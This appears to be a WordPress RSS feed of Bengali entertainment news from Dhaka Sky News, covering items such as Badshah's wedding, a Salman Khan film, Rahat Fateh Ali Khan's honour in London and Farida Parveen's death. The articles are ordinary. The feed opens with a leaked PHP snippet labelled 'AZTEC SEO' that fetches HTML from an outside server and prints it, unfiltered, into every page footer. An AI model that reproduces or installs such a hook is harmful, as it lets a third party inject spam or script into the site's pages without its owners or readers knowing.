/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); বিনোদন – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Thu, 26 Mar 2026 12:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 দ্বিতীয়বার বিয়ের পিঁড়িতে বাদশা, পাঞ্জাবি অভিনেত্রী ইশার সঙ্গে নতুন জীবন শুরু https://www.dhakaskynews.com/enternainment/2026/03/26/News_ID-6699/ https://www.dhakaskynews.com/enternainment/2026/03/26/News_ID-6699/#respond Thu, 26 Mar 2026 12:45:00 +0000 https://www.dhakaskynews.com/?p=6699

দ্বিতীয়বার বিয়ের পিঁড়িতে বাদশা, পাঞ্জাবি অভিনেত্রী ইশার সঙ্গে নতুন জীবন শুরু

বলিউডের জনপ্রিয় র‍্যাপার ও সংগীতশিল্পী বাদশা তার ব্যক্তিগত জীবনে এক নতুন অধ্যায় শুরু করেছেন। দীর্ঘদিনের জল্পনার অবসান ঘটিয়ে পাঞ্জাবি অভিনেত্রী ইশা রিখির সঙ্গে বিবাহবন্ধনে আবদ্ধ হয়েছেন তিনি।

সম্প্রতি সামাজিক যোগাযোগমাধ্যমে এই তারকাযুগলের বিয়ের বেশ কিছু ছবি ছড়িয়ে পড়ার পর বিষয়টি নিয়ে ব্যাপক আলোচনা শুরু হয়। পরবর্তীতে ভারতীয় সংবাদমাধ্যম এনডিটিভি নিশ্চিত করেছে যে, পরিবারের ঘনিষ্ঠজন ও বন্ধুদের উপস্থিতিতে অত্যন্ত গোপনীয়তার সঙ্গে তাদের বিয়ের আনুষ্ঠানিকতা সম্পন্ন হয়েছে। ইশা রিখির মা পুনম রিখি ইনস্টাগ্রামে প্রথাগত বিয়ের আচারের কিছু ছবি শেয়ার করার পর থেকেই ভক্তদের মধ্যে এই সুখবরটি জানাজানি হয়।

জানা গেছে, ইশা এবং বাদশার প্রথম পরিচয় হয়েছিল এক বন্ধুর পার্টিতে। সেখান থেকেই তাদের মধ্যে বন্ধুত্ব এবং পরে প্রেমের সম্পর্ক গড়ে ওঠে। প্রথম স্ত্রী জেসমিন মাসিহর সঙ্গে ২০২০ সালে বিচ্ছেদের প্রায় ছয় বছর পর দ্বিতীয়বার বিয়ের সিদ্ধান্ত নিলেন বাদশা। বিয়ের ভাইরাল হওয়া ছবিগুলোতে এই দম্পতিকে ঐতিহ্যবাহী পোশাকে মালাবদল করতে দেখা গেছে।

যদিও নবদম্পতি এখনো আনুষ্ঠানিকভাবে সামাজিক যোগাযোগমাধ্যমে বিয়ের ঘোষণা দেননি, তবে ইশার মায়ের শেয়ার করা ছবিগুলো তাদের নতুন জীবনের শুভ সূচনার প্রমাণ দিচ্ছে।

এর আগে, ২০১২ সালে জেসমিন মাসিহর সঙ্গে বিবাহবন্ধনে আবদ্ধ হয়েছিলেন বাদশা। তাদের সংসারে জেসমিন গ্রেস মাসিহ সিং নামে একটি কন্যাসন্তান রয়েছে। ২০১৭ সালে মেয়ের জন্মের পর থেকেই তাদের সম্পর্কে টানাপোড়েন শুরু হয় এবং দীর্ঘ আট বছরের সংসার জীবনের ইতি টেনে ২০২০ সালে তারা আইনগতভাবে আলাদা হয়ে যান।

এক সাক্ষাৎকারে বাদশাহ জানিয়েছিলেন, লন্ডনে বড় হওয়া জেসমিনের পক্ষে ভারতীয় সংস্কৃতির সঙ্গে মানিয়ে নেওয়া কঠিন হয়ে পড়েছিল এবং সন্তানের সুন্দর ভবিষ্যতের কথা চিন্তা করেই তারা বিচ্ছেদের কঠিন সিদ্ধান্ত নিয়েছিলেন। বর্তমানে বাদশার মেয়ে তার মায়ের সঙ্গে লন্ডনে থাকলেও নিয়মিত মেয়ের সঙ্গে যোগাযোগ রাখেন এই গায়ক।

]]>
https://www.dhakaskynews.com/enternainment/2026/03/26/News_ID-6699/feed/ 0
সিনেমার প্রয়োজনে আস্ত শহর নির্মাণ, নতুন ছবিতে চমকে দেবেন সালমান https://www.dhakaskynews.com/enternainment/2026/03/26/News_ID-6696/ https://www.dhakaskynews.com/enternainment/2026/03/26/News_ID-6696/#respond Thu, 26 Mar 2026 12:43:53 +0000 https://www.dhakaskynews.com/?p=6696

সিনেমার প্রয়োজনে আস্ত শহর নির্মাণ, নতুন ছবিতে চমকে দেবেন সালমান

বলিউডের ‘ভাইজান’ সালমান খানের ভক্তদের জন্য বড় সুখবর। বহুল প্রতীক্ষিত সিনেমা ‘মাতৃভূমি’ মুক্তির অপেক্ষায় থাকার মাঝেই নিজের পরবর্তী প্রজেক্ট নিয়ে মাঠে নামছেন এই মহাতারকা। দীর্ঘ জল্পনা-কল্পনার অবসান ঘটিয়ে দক্ষিণী প্রযোজক দিল রাজু এবং জাতীয় পুরস্কারপ্রাপ্ত পরিচালক বংশী পাইডিপল্লীর বিগ বাজেট অ্যাকশন সিনেমার শুটিং শুরু হতে যাচ্ছে আগামী ১৪ এপ্রিল।

মুম্বাইয়ের গোরেগাঁও এসআরপিএফ গ্রাউন্ডে বিশাল আয়োজনে এই সিনেমার প্রথম পর্যায়ের কাজ শুরু হবে বলে জানা গেছে।

সূত্রমতে, এই সিনেমার জন্য কোনো সাধারণ সেট নয়, বরং একটি আস্ত ‘মিনি সিটি’ বা ছোট শহর তৈরি করা হচ্ছে। সেটটি এমনভাবে নকশা করা হয়েছে যাতে একটি ঘনবসতিপূর্ণ শিল্পাঞ্চল বা ইন্ডাস্ট্রিয়াল টাউনশিপের আবহ পাওয়া যায়। ছবির গল্পের প্রয়োজনে সেখানে হাইভোল্টেজ ও বড় মাপের অ্যাকশন সিক্যুয়েন্সের চিত্রায়ন করা হবে।

সিনেমার সঙ্গে যুক্ত একজন ইনসাইডার জানিয়েছেন, সেট নির্মাণ থেকে শুরু করে অ্যাকশন কোরিওগ্রাফি এবং কাস্টিং—সবই প্রায় চূড়ান্ত। একটি উচ্চাভিলাষী প্রজেক্ট হিসেবে পরিচালক বংশী পাইডিপল্লী সালমান খানকে সম্পূর্ণ নতুন এক লুকে পর্দায় হাজির করতে যাচ্ছেন।

নাম ঠিক না হওয়া এই সিনেমাটিতে বলিউড ও দক্ষিণী সিনেমার নামী তারকাদের এক বিশাল সমাহার থাকবে বলে আভাস পাওয়া গেছে। সালমানের অত্যন্ত প্রিয় একটি অ্যাকশন থ্রিলার স্ক্রিপ্ট এবং এর ভেতরের আবেগঘন গল্পই তাকে এই প্রজেক্টে যুক্ত হতে উৎসাহিত করেছে।

নির্মাতা প্রতিষ্ঠান ২০২৭ সালে সিনেমাটি বড় পর্দায় আনার লক্ষ্যমাত্রা নির্ধারণ করেছে। সালমানের চিরচেনা বাণিজ্যিক ঘরানার সঙ্গে দক্ষিণী মেকিংয়ের মেলবন্ধনে তৈরি এই ছবিটি বক্স অফিসে নতুন রেকর্ড গড়বে বলে আশা করছেন সংশ্লিষ্টরা।

]]>
https://www.dhakaskynews.com/enternainment/2026/03/26/News_ID-6696/feed/ 0
‘শাকিবের সঙ্গে কতগুলো ছবি করেছি অনেকে জানেই না’ https://www.dhakaskynews.com/enternainment/2026/03/25/News_ID-6651/ https://www.dhakaskynews.com/enternainment/2026/03/25/News_ID-6651/#respond Wed, 25 Mar 2026 13:24:56 +0000 https://www.dhakaskynews.com/?p=6651
‘শাকিবের সঙ্গে কতগুলো ছবি করেছি অনেকে জানেই না’

ঢাকাই চলচ্চিত্রের শীর্ষ নায়ক শাকিব খান এবং গ্ল্যামার গার্ল পূর্ণিমা। ক্যারিয়ারের শুরুর দিকে এই জুটি উপহার দিয়েছেন বেশ কিছু আলোচিত সিনেমা। কিন্তু সাম্প্রতিক সময়ে পর্দায় তাদের একসঙ্গে দেখা না যাওয়ায় অনেক দর্শক ভুলে গেছেন তাদের কাজের পরিধি।

সম্প্রতি এক সাক্ষাৎকারে শাকিব খানের সঙ্গে নিজের কাজের সেই সোনালী দিনগুলোর স্মৃতিচারণ করলেন পূর্ণিমা। পূর্ণিমা জানান, শাকিব খানের সঙ্গে তার কাজের সংখ্যা নেহাত কম নয়।

সাক্ষাৎকারে পুর্ণিমা বলেন, ‘শাকিবের সাথে আমি অনেকগুলো ছবি করেছি, কেউ জানেই না। অনেকে এখনো বলে কি, আপনি কি শাকিবের সাথে কাজ করেছেন কখনো?’

পূর্ণিমা আরও বলেন, ‘ও ইয়ং, আমিও ইয়ং। মানে আমরা তো একসাথেই এসেছি আগে-পরে হোক যখনই হোক।’

অভিনেত্রী বলেন, ‘শাকিব পপুলার হওয়ার আগে, মানে ওকে নিয়ে ওর সাথে আমি টিভিসি করেছি অনেকগুলো দেশের বাইরে গিয়ে। তখন শাকিবকে যতটুকু না চিনত আমি তখন ওর সাথে কাজ করেছি। কিন্তু ওর সাথে যে আমি প্রায় ২৫ থেকে ২৬টার মতন ছবি করেছি।’

]]>
https://www.dhakaskynews.com/enternainment/2026/03/25/News_ID-6651/feed/ 0
ব্রিটিশ পার্লামেন্টে বিশেষ সংবর্ধনা পেলেন রাহাত ফাতেহ আলী খান https://www.dhakaskynews.com/enternainment/2026/03/25/News_ID-6648/ https://www.dhakaskynews.com/enternainment/2026/03/25/News_ID-6648/#respond Wed, 25 Mar 2026 13:23:39 +0000 https://www.dhakaskynews.com/?p=6648
ব্রিটিশ পার্লামেন্টে বিশেষ সংবর্ধনা পেলেন রাহাত ফাতেহ আলী খান

ছবি: সংগৃহীত

উপমহাদেশের সংগীতের কিংবদন্তি শিল্পী রাহাত ফাতেহ আলী খান এবং তার পুত্র শাহজামান খানকে ব্রিটিশ পার্লামেন্টের হাউসেস অব পার্লামেন্টে বিশেষভাবে সংবর্ধিত করা হয়েছে। সাংস্কৃতিক কূটনীতি এবং সংগীতের উৎকর্ষ উদযাপনে আয়োজিত এই অনুষ্ঠানে ভারত, পাকিস্তান এবং বাংলাদেশের বিশিষ্ট ব্যক্তিরা উপস্থিত ছিলেন।

এই অনুষ্ঠানের অন্যতম প্রধান আকর্ষণ ছিল ভারত, পাকিস্তান, বাংলাদেশ ও যুক্তরাজ্যের যৌথ প্রযোজনায় নির্মিত বাংলা দ্বৈত গান ‘প্রেম পিয়াসা – রিলোডেড’-এর আনুষ্ঠানিক উন্মোচন। গানটিতে রাহাত ফাতেহ আলী খানের সঙ্গে কণ্ঠ দিয়েছেন প্রখ্যাত ব্রিটিশ-বাংলাদেশি শিল্পী রুবায়াত জাহান। ধ্রুব মিউজিক স্টেশনের ব্যানারে মুক্তি পাওয়া এই গানটি দক্ষিণ এশিয়ার দেশগুলোর মধ্যে একটি সাংস্কৃতিক সেতুবন্ধন হিসেবে দেখা হচ্ছে।

গানটির গীতিকার বাংলাদেশের কবির বকুল। সুর ও সংগীত আয়োজনে ছিলেন যুক্তরাজ্যের রাজা কাশেফ। আর ভিডিও পরিচালনায় ছিলেন বাংরাদেশের সৈকত রেজা।

ব্রিটিশ-এশিয়ান শিল্পী রাজা কাশেফের উদ্যোগে আয়োজিত এই অনুষ্ঠানে উপস্থিত ছিলেন রুথ ক্যাডবেরি, আসিফ আকবর, ব্যারোনেস উদ্দিন, আফজাল খান এবং আফসানা বেগমের মতো বিশিষ্ট রাজনীতিক ও কমিউনিটি নেতারা।

অনুষ্ঠানে লর্ড তারিক আহমদ তার বক্তব্যে বলেন, নুসরাত ফাতেহ আলী খানের যে উত্তরাধিকার রাহাত বহন করছেন, তা এখন তার পুত্র শাহজামানের মাধ্যমে আরও সমৃদ্ধ হচ্ছে।

সংবর্ধনা পেয়ে রাহাত ফাতেহ আলী খান বলেন, ব্রিটিশ পার্লামেন্টে এই স্বীকৃতি কেবল আমার নয়, এটি সুফি কাওয়ালি এবং আধুনিক উর্দু-বাংলা সংগীতের জয়। রাজা কাশেফ এবং রুবায়াত জাহানের সঙ্গে কাজ করা সবসময়ই আনন্দের, আর ‘প্রেম পিয়াসা’ একটি বিশেষ সৃষ্টি।

বর্তমানে লন্ডনে অবস্থানরত রাহাত ফাতেহ আলী খান সম্প্রতি রয়্যাল অ্যালবার্ট হলে একটি হাউসফুল কনসার্টে পারফর্ম করেছেন। এই সপ্তাহেই তিনি তার ব্যান্ড নিয়ে আরও কিছু ব্যক্তিগত অনুষ্ঠানে অংশ নেবেন।

]]>
https://www.dhakaskynews.com/enternainment/2026/03/25/News_ID-6648/feed/ 0
পরলোকে ফরিদা পারভীন https://www.dhakaskynews.com/bangladesh/2025/09/14/News_ID-5551/ https://www.dhakaskynews.com/bangladesh/2025/09/14/News_ID-5551/#respond Sun, 14 Sep 2025 05:35:13 +0000 https://www.dhakaskynews.com/?p=5551 লালন সংগীতের খ্যাতিমান শিল্পী ফরিদা পারভীন শনিবার দিবাগত রাত ১০টা ১৫ মিনিটে রাজধানীর একটি বেসরকারী হাসপাতালে চিকিৎসাধীন অবস্থায় মৃত্যুবরণ করেছেন। মৃত্যুকালে তার বয়স হয়েছিল ৭১ বছর। তিনি স্বামী এবং চার সন্তান রেখে গেছেন।

ফরিদা পারভীনের পরিবারের সদস্যরা জানান, শহীদ মিনারে শ্রদ্ধা নিবেদনের পর বেলা ১২টার দিকে ঢাকা বিশ্ববিদ্যালয়ের কেন্দ্রীয় জামে মসজিদে প্রথম জানাজা অনুষ্ঠিত হবে। পরে মরদেহ কুষ্টিয়ায় নিয়ে যাওয়া হবে। তার শেষ ইচ্ছে অনুযায়ী বাবা-মায়ের কবরের পাশে কিংবদন্তি এই শিল্পীকে দাফন করা হবে।

বরেণ্য এই সংগীত শিল্পীর মৃত্যুতে প্রধান উপদেষ্টা ড. মুহাম্মদ ইউনূস শোক জানিয়েছেন। সংস্কৃতি উপদেষ্টা মোস্তফা সরয়ার ফারুকী, বিএনপির ভারপ্রাপ্ত চেয়ারম্যান তারেক রহমান, মহাসচিব মির্জা ফখরুলসহ বিভিন্ন রাজনৈতিক দলের নেতারা শোক জানিয়েছেন।

ফরিদা পারভীন দীর্ঘদিন ধরে কিডনি জটিলতায় ভুগছিলেন। নিয়মিত ডায়ালাইসিসের অংশ হিসেবে ২ সেপ্টেম্বর মহাখালীর ইউনিভার্সেল মেডিকেল কলেজ হাসপাতালে নেওয়া হয় তাকে। কিন্তু ডায়ালাইসিসের পর তার শারীরিক অবস্থার অবনতি হয়। তখন চিকিৎসক তাকে হাসপাতালে ভর্তি করানোর পরামর্শ দেন। এর পর থেকে তিনি হাসপাতালের আইসিইউতে চিকিৎসাধীন ছিলেন। গত বুধবার অবস্থার অবনতি হলে তাকে ভেন্টিলেশনে রাখার সিদ্ধান্ত নেওয়া হয়। অবশেষে চিকিৎসকদের সব চেষ্টা ব্যর্থ করে তিনি না ফেরার দেশে চলে যান।

কিংবদন্তি শিল্পী ফরিদা পারভীন ১৯৫৪ সালে ৩১ ডিসেম্বর নাটোরের সিংড়া থানায় জন্মগ্রহণ করেন। ১৯৬৮ সালে ১৪ বছর বয়সে তার পেশাদার সংগীতজীবন শুরু হয়। এরপর গানে গানে তিনি কাটিয়েছেন ৫৫ বছর। ‘খাঁচার ভিতর অচিন পাখি কেমনে আসে যায়’, ‘বাড়ির কাছে আরশিনগর সেথা পরশী বসত করে’ এবং ‘তোমরা ভুলেই গেছ মল্লিকাদির নাম’ এর মতো জনপ্রিয় গান তার কন্ঠে মানুষের হৃদয় ছুঁয়েছে। শ্রোতারা ভালোবাসে তাকে ‘লালনকন্যা’ উপাধি দিয়েছিলেন।

]]>
https://www.dhakaskynews.com/bangladesh/2025/09/14/News_ID-5551/feed/ 0
স্বকীয় সৌন্দর্যের বর্ণনা, সমালোচনার ঝড় https://www.dhakaskynews.com/enternainment/2025/04/18/News_ID-5516/ https://www.dhakaskynews.com/enternainment/2025/04/18/News_ID-5516/#respond Fri, 18 Apr 2025 16:48:59 +0000 https://www.dhakaskynews.com/?p=5516 উর্বশী রাউতেলা আবারও এক বিতর্কে জড়ালেন । স্বকীয় সৌন্দর্যের বর্ণনা দিতে গিয়ে সমালোচনার শিকার হন তিনি।

উর্বশী রাউতেলা বলেন, উত্তরাখাণ্ডের মানুষ এমনিতেই লম্বা, ফর্সা এবং সুন্দর। আমার বাবাকেই দেখুন। ফর্সা, সুন্দর ও লম্বা। একেবারে সুপার মডেলের মতো। আমার দিদা বৈজয়ন্তীমালার থেকে কম সুন্দর নয়।

তিনি বলেন, আমার যা দেখছেন সবটাই স্বাভাবিক। এর মধ্যে কৃত্রিম কিছু নেই।

উর্বশীর এমন মন্তব্যে বিতর্কের ঝড় বইছে। সমালোচনায় ভরিয়ে দিয়েছেন নেটিজেনরা।

]]>
https://www.dhakaskynews.com/enternainment/2025/04/18/News_ID-5516/feed/ 0
বিমানবন্দরে মাহিকে দীর্ঘ সময় জিজ্ঞাসাবাদ https://www.dhakaskynews.com/enternainment/2024/08/29/News_ID-5466/ https://www.dhakaskynews.com/enternainment/2024/08/29/News_ID-5466/#respond Thu, 29 Aug 2024 05:36:49 +0000 https://www.dhakaskynews.com/?p=5466 রাজধানীর হযরত শাহ জালাল আন্তর্জাতিক বিমান বন্দরে গিয়ে বিপাকে পড়েছিলেন ঢাকাই চলচ্চিত্রের আলোচিত চিত্রনায়িকা মাহিয়া মাহি। সেখানে তাকে কয়েক ঘণ্টা অপেক্ষায় রাখা হয় এবং জিজ্ঞাসাবাদ করা হয়। অপরাধীদের তালিকায় নাম রয়েছে কিনা তা যাচাই করা হয়।

সম্প্রতি ফেসবুকে এক ভিডিওবার্তায় অভিনেত্রী জানান, বিমানবন্দরে বিভিন্ন গোয়েন্দা সংস্থার রিপোর্টে তার নাম আছে কিনা তা খতিয়ে দেখা হয়েছে। এক থেকে দেড় ঘণ্টা হবে, আমি জাস্ট বসেছিলাম। কারণ কর্তৃপক্ষ নিশ্চিত হতে চাইছিল আমার বিরুদ্ধে কোনো অভিযোগ আছে কিনা। ডিজিএফআই, এনএসআইসহ বিভিন্ন গোয়েন্দা সংস্থার রিপোর্ট ভালোভাবে চেক করার পরই ফ্লাই করতে পেরেছি।

পুরো বিষয়টিকে ইতিবাচকভাবেই দেখছেন বলে জানিয়েছেন এই অভিনেত্রী। তিনি মনে করেন, দেশের সার্বিক অবস্থা বিবেচনায় কড়া নিরাপত্তা ব্যবস্থা মন্দ কিছু নয়।

প্রসঙ্গত, বৈষম্যবিরোধী ছাত্র আন্দোলনে শিক্ষার্থী-জনতার তোপের মুখে গত ৫ আগস্ট পদত্যাগ করেন শেখ হাসিনা। তার দেশত্যাগের খবর ছড়িয়ে পড়তেই আওয়ামী লীগ এবং দলটির সহযোগী অঙ্গসংগঠনের বিভিন্ন স্তরের নেতাকর্মীরাও দেশ ছাড়ার চেষ্টা করেন। কেউ কেউ আত্মগোপনেও চলে যান। যদিও ইতোমধ্যে কয়েকজন নেতাকর্মীকে গ্রেপ্তার করেছে আইনশৃঙ্খলা রক্ষাকারী বাহিনী।

আওয়ামী লীগ সরকার পতনের পর কোনো ধরনের অপরাধী যেন দেশ ছাড়তে না পারে, এ জন্য বিভিন্ন পর্যায়ে নিরাপত্তা জোরদার করা হয়েছে। সেই ধারাবাহিবতায় বিমানবন্দরেও নজরদারির ব্যবস্থা করা হয়েছে।

]]>
https://www.dhakaskynews.com/enternainment/2024/08/29/News_ID-5466/feed/ 0
পূর্ণদৈর্ঘ্য চলচ্চিত্র নিয়ে উচ্ছ্বসিত মেহজাবিন https://www.dhakaskynews.com/enternainment/2024/08/28/News_ID-5449/ https://www.dhakaskynews.com/enternainment/2024/08/28/News_ID-5449/#respond Wed, 28 Aug 2024 08:10:22 +0000 https://www.dhakaskynews.com/?p=5449 মেহজাবিন চৌধুরী। ছোট পর্দায় টানা কয়েক বছর কাজ করে নাটকের শীর্ষ অভিনেত্রীর তালিকায় উঠে এসেছেন তিনি।

ভার্সেটাইল অভিনেত্রী হিসেবে নানা চরিত্রে নিজেকে প্রমাণ করেছেন। এরপর অবশ্য গতানুগতিক গল্প এবং নতুনদের সুযোগ দেয়ার জন্য নাটকে কাজ প্রায় বন্ধই করে দেন।

মনের মতো হলে সিনেমা কিংবা ওয়েবের কাজ করবেন বলেও জানান তিনি। পাশাপাশি বিজ্ঞাপনে নিয়মিত কাজ করছেন।

এদিকে নতুন খবর হলো, মেহজাবিন এরইমধ্যে তার অভিনীত প্রথম পূর্ণদৈর্ঘ্য চলচ্চিত্রের কাজ শেষ করে ফেলেছেন।

শুধু তাই নয়, ‘সাবা’ নামের এ সিনেমাটি টরন্টো আন্তর্জাতিক চলচ্চিত্র উৎসবে অফিশিয়ালি নির্বাচিত হয়েছে।

৭ই সেপ্টেম্বর প্রথমবারের মতো আন্তর্জাতিকভাবে প্রদর্শিত হবে ছবিটি। ছবিটির পরিচালক মাকসুদ হোসাইন।

মেহজাবিন জানান, তিনি ৮ সেপ্টেম্বর ছবিটির দ্বিতীয় প্রদর্শনীটি সবার সঙ্গে উপভোগ করবেন। বিষয়টি নিয়ে বেশ উচ্ছ্বসিত।

তিনি বলেন, আমার প্রথম সিনেমায় আমি চেয়েছিলাম এমন একটা চরিত্রকে পর্দায় ফুটিয়ে তুলতে যা অডিয়েন্সকে অন্তত অল্প কিছু সময়ের জন্য হলেও ভাবায় এবং অবশ্যই যে চরিত্র দেশীয় ও আন্তর্জাতিক দুই পরিসরের দর্শকের সঙ্গেই মেলবন্ধন তৈরি করে।

মেহজাবিন জানান, আমি সৌভাগ্যবান যে, আমার সেই চেষ্টা, সেই ইচ্ছা বাস্তবে রূপ পেয়েছে।

কানাডায় অবস্থানরত আমার সকল ভক্ত এবং শুভাকাঙ্ক্ষীদের জানাতে চাই, আমার টিমের সঙ্গে ‘সাবা’ এর ওয়ার্ল্ড প্রিমিয়ার দেখার সুযোগ আপনারাই সর্বপ্রথম পেতে যাচ্ছেন।

আশা করছি নিজের দেশের সিনেমা আন্তর্জাতিক ফেস্টিভ্যালে দেখার অনুভূতি আপনাদের উপস্থিতির কারণে দ্বিগুণ হয়ে যাবে।

]]>
https://www.dhakaskynews.com/enternainment/2024/08/28/News_ID-5449/feed/ 0
ভারতীয় সিনেমায় শাহরুখ খান সৌন্দর্যের প্রতীক : রাশমিকা মান্দানা https://www.dhakaskynews.com/bangladesh/2023/08/09/News_ID-5179/ https://www.dhakaskynews.com/bangladesh/2023/08/09/News_ID-5179/#respond Wed, 09 Aug 2023 15:24:22 +0000 https://www.dhakaskynews.com/?p=5179 ভারতের দক্ষিণী সিনেমার জনপ্রিয় অভিনেত্রী রাশমিকা মান্দানা তেলেগু ও হিন্দি ভাষার সিনেমায় বেশ ভালোই করছেন। এবার তিনি বলিউড বাদশা শাহরুখ খানের সঙ্গে জুটি বাঁধতে চলেছেন। তবে কোনো সিনেমায় নয়, একটি বাণিজ্যিক বিজ্ঞাপনে দেখা যাবে তাদের। যশ রাজ ফিল্মসের স্টুডিওতে একসঙ্গে দেখা গেছে তাদের।

শাহরুখ খানের মুক্তি প্রতীক্ষিত সিনেমা ‘জওয়ান’। অ্যাটলি পরিচালিত এ সিনেমায় তার বিপরীতে অভিনয় করেছেন দক্ষিণী সিনেমার লেডি সুপারস্টার নয়নতারা। আগামী ৭ সেপ্টেম্বর মুক্তি পাবে এটি।

এদিকে, ক্যারিয়ারে বেশ কিছু ব্যবসাসফল সিনেমা উপহার দিয়েছেন রাশমিকা মান্দানা। তার অভিনয় ক্যারিয়ারে যতটা যশ–খ্যাতি কুড়িয়েছেন সবই দক্ষিণী সিনেমার কল্যাণে। তার ‘পুষ্পা’ সিনেমা বক্স অফিসে রীতিমতো ঝড় তুলেছিল। দক্ষিণী সিনেমার পাশাপাশি বলিউড সিনেমাতেও মন দিয়েছেনে এই অভিনেত্রী। ‘গুডবাই’ সিনেমার মাধ্যমে বলিউডে অভিষেক হয় তার। অভিনেত্রীর পরবর্তী হিন্দি সিনেমা ‘অ্যানিমেল’। সুদীপ রেড্ডি ভাঙা পরিচালিত এ সিনেমায় তার বিপরীতে অভিনয় করেছেন রণবীর কাপুর। আগামী ১ ডিসেম্বর মুক্তি পাবে সিনেমাটি।

]]>
https://www.dhakaskynews.com/bangladesh/2023/08/09/News_ID-5179/feed/ 0
লাল শাড়ি পরে ‘লাল শাড়ি’ দেখলেন তারকারা https://www.dhakaskynews.com/bangladesh/2023/07/08/News_ID-5106/ https://www.dhakaskynews.com/bangladesh/2023/07/08/News_ID-5106/#respond Sat, 08 Jul 2023 14:43:44 +0000 https://www.dhakaskynews.com/?p=5106 ঢাকাই সিনেমার বিউটি কুইন’খ্যাত অভিনেত্রী অপু বিশ্বাস। এবার ঈদে মুক্তি পেয়েছে তার অভিনীত সিনেমা ‘লাল শাড়ি’। অভিনয়ের পাশাপাশি সরকারি অনুদানের এ সিনেমার প্রযোজনাও করেছেন তিনি। গেল শুক্রবার বিকালে রাজধানীর যমুনা ব্লকবাস্টার সিনেমাসে লাল শাড়ি পরে সিনেমাটি দেখতে গেলেন অপু বিশ্বাস। সঙ্গে ছিলেন অঞ্জনা, নিপুণসহ অনেকেই।

এসময় অপু বলেন, ‘ঈদের দিন থেকে “লাল শাড়ি” ভালো চলছে, দর্শকরাও ভালো বলছে। আজকে আমাদের সিনেমার শিল্পী-কলাকুশলী সিনেমাটা দেখতে এসেছি। খুব ভালো লাগছে। দর্শক অন্যদের সিনেমা পাশাপাশি আমাদের সিনেমাটা দেখছে। ভালো রিভিউ দিচ্ছে।’

আরও পড়ুন: অপুর সিনেমা ‘লাল শাড়ি’র জন্য শাকিবের শুভেচ্ছা

চিত্রনায়িকা অঞ্জনা বলেন, ‘দ্বিতীয়বার দেখলাম খুব ভালো লাগছে। এই রকম সিনেমা আরও মুক্তি পাক আমি চাই। গত বছর থেকে আমরা একটু একটু করে এগিয়ে যাচ্ছি। আমাদের সিনেমা এগিয়ে যাচ্ছে। “লাল শাড়ি” আমি আগে দেখেছি। আবারও দেখলাম। সিনেমাটা আমাদের মাটির গল্প। আমি দর্শকদের আহ্বান জানাবো বাংলা সিনেমা দেখার জন্য।’

চিত্রনায়িকা নিপুণ আক্তার বলেন, ‘খুব ভালো লাগছে। অপু বিশ্বাসকে ধন্যবাদ। এত সুন্দর সিনেমা দর্শকদের উপহার দেওয়া জন্য। আশা করছি, সামনে তার প্রযোজিত আরও সিনেমা দর্শক দেখবে।’

‘লাল শাড়ি’ তৈরি হয়েছে বাংলাদেশের ঐতিহ্যবাহী তাঁতশিল্প নিয়ে। এর প্রধান চরিত্রে অভিনয় করছেন অপু বিশ্বাস ও চিত্রনায়ক সাইমন সাদিক। সিনেমাটি নির্মাণ করেছেন বন্ধন বিশ্বাস।

]]>
https://www.dhakaskynews.com/bangladesh/2023/07/08/News_ID-5106/feed/ 0